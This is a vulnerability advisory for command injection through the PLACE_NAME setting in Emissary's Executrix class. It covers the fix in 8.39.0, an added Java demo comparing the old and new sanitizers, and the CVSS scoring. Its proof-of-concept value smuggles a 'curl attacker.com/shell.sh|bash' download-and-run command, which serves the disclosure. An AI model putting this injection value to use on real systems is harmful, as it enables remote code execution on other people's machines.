The Executrix utility class constructed shell commands by concatenating
configuration-derived values — including the PLACE_NAME parameter — with
insufficient sanitization. Only spaces were replaced with underscores, allowing
shell metacharacters (;, |, $, `, (, ), etc.) to pass through
into /bin/sh -c command execution.
Executrix.java
Insufficient sanitization (line 132):
this.placeName = this.placeName.replace(' ', '_');
// ONLY replaces spaces — shell metacharacters pass through
Shell sink (line 1052–1058):
protected String[] getTimedCommand(final String c) {
return new String[] {"/bin/sh", "-c", "ulimit -c 0; cd " + tmpNames[DIR] + "; " + c};
}
Attack flow:
1. PLACE_NAME is read from a configuration file.
2. Executrix applies only a space-to-underscore replacement.
3. placeName is used to construct temporary directory paths (tmpNames[DIR]).
4. tmpNames[DIR] is concatenated into a shell command string that is executed by /bin/sh -c.
Proof of concept:
PLACE_NAME = "test;curl attacker.com/shell.sh|bash;x"
After the original sanitization: test;curl_attacker.com/shell.sh|bash;x
(semicolons, pipes, and other metacharacters preserved)
Fixed in PR #1290, merged into release 8.39.0.
The space-only replacement was replaced with an allowlist regex that rewrites every
character outside [a-zA-Z0-9_-] to an underscore, so nothing a shell parses as
syntax survives into the path:
protected static final Pattern INVALID_PLACE_NAME_CHARS = Pattern.compile("[^a-zA-Z0-9_-]");
protected static String cleanPlaceName(final String placeName) {
return INVALID_PLACE_NAME_CHARS.matcher(placeName).replaceAll("_");
}
This ensures...
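The following is an added example, not code from the Emissary project or from the advisory. It puts the original space-only replacement next to the allowlist from the fix, rebuilds the string that getTimedCommand hands to /bin/sh -c for each, and checks that value for unquoted shell metacharacters. The base temp directory (/tmp/emissary) and the way the cleaned placeName becomes a path component of tmpNames[DIR] are assumptions made for illustration, as is the argvCommand method, which is a hardening suggestion beyond what PR #1290 changed.

```java
import java.util.regex.Pattern;

/**
 * Added example (not Emissary code): original vs. fixed placeName sanitizer,
 * and what each lets reach the "/bin/sh -c" sink.
 * Assumptions: base temp dir "/tmp/emissary", cleaned name is one path component.
 */
public class PlaceNameSanitizerDemo {

    /** Original sanitizer: only spaces become underscores. */
    static String cleanPlaceNameOriginal(String placeName) {
        return placeName.replace(' ', '_');
    }

    /** Sanitizer from the fix: any character outside [a-zA-Z0-9_-] becomes '_'. */
    static final Pattern INVALID_PLACE_NAME_CHARS = Pattern.compile("[^a-zA-Z0-9_-]");

    static String cleanPlaceNameFixed(String placeName) {
        return INVALID_PLACE_NAME_CHARS.matcher(placeName).replaceAll("_");
    }

    /** Assumed: the cleaned name becomes one path component of the temp directory. */
    static String tmpDirFor(String cleanedPlaceName) {
        return "/tmp/emissary/" + cleanedPlaceName;
    }

    /** The third array element getTimedCommand passes to "/bin/sh -c". */
    static String shellString(String tmpDir, String c) {
        return "ulimit -c 0; cd " + tmpDir + "; " + c;
    }

    /** Characters that a POSIX shell treats as syntax when they appear unquoted. */
    static final Pattern SHELL_META = Pattern.compile("[;|&$`()<>\\\\\"'*?\\[\\]{}~#!\\s]");

    static boolean containsShellMeta(String s) {
        return SHELL_META.matcher(s).find();
    }

    /**
     * Added hardening suggestion, not part of PR #1290: pass the path to sh as a
     * positional parameter instead of splicing it into the script text. "$1" is
     * expanded after the shell has parsed the script, so its contents are never
     * read as syntax, whatever the sanitizer did or did not remove.
     */
    static String[] argvCommand(String tmpDir, String c) {
        return new String[] {"/bin/sh", "-c", "ulimit -c 0; cd \"$1\"; " + c, "sh", tmpDir};
    }

    public static void main(String[] args) {
        // Constructed hostile value, the same one used in the proof of concept above.
        String hostile = "test;curl attacker.com/shell.sh|bash;x";
        String c = "ls -l";

        String original = cleanPlaceNameOriginal(hostile);
        String fixed = cleanPlaceNameFixed(hostile);

        System.out.println("original : " + original);
        System.out.println("  -> sh -c: " + shellString(tmpDirFor(original), c));
        System.out.println("  metacharacters reach the shell: " + containsShellMeta(original));

        System.out.println("fixed    : " + fixed);
        System.out.println("  -> sh -c: " + shellString(tmpDirFor(fixed), c));
        System.out.println("  metacharacters reach the shell: " + containsShellMeta(fixed));

        System.out.println("argv form: " + String.join(" | ", argvCommand(tmpDirFor(original), c)));
    }
}
```

Running the demo prints the original cleaner leaving `;`, `|` and `/` intact, so `cd /tmp/emissary/test;curl_attacker.com/shell.sh|bash;x; ls -l` is what the shell parses, while the fixed cleaner yields `test_curl_attacker_com_shell_sh_bash_x`, which contains nothing the shell interprets. The allowlist is the right fix for the regex, but the argv form shows the shape that removes the class of bug entirely: once the untrusted value travels as an argument rather than as script text, the sanitizer is defence in depth rather than the only barrier.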
Patched version: 8.39.0
CVSS 3.1 base score: 7.2 (High)
Exploitability: AV:N, AC:L, PR:H, UI:N
Scope: S:U
Impact: C:H, I:H, A:H
Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H